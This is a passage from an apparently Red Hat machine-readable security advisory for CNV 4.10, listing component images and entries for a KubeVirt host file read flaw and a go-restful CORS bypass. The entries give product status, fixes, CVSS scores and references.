"default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], known_not_affected: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-06T14:00:38+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6351", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, { cve: "CVE-2022-1996", cwe: { id: "CWE-639", name: "Authorization Bypass Through User-Controlled Key", }, discovery_date: "2022-06-08T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2094982", }, ], notes: [ { category: "description", text: "A flaw was found in CORS Filter feature from the go-restful package. When a user inputs a domain which is in AllowedDomains, all domains starting with the same pattern are accepted. This issue could allow an attacker to break the CORS policy by allowing any page to make requests and retrieve data on behalf of users.", title: "Vulnerability description", }, { category: "summary", text: "go-restful: Authorization Bypass Through User-Controlled Key", title: "Vulnerability summary", }, { category: "other", text: "The go-restful package is a transitive dependency which is being pulled with k8s.io/api and not directly being used anywhere in OpenShift Container Platform (OCP), OpenShift Container Storage, OpenShift Data Foundation, OpenShift Do and OpenShift Pipelines, hence these components are marked as 'Will not fix' or even \"Not affected\".", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], known_not_affected: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", 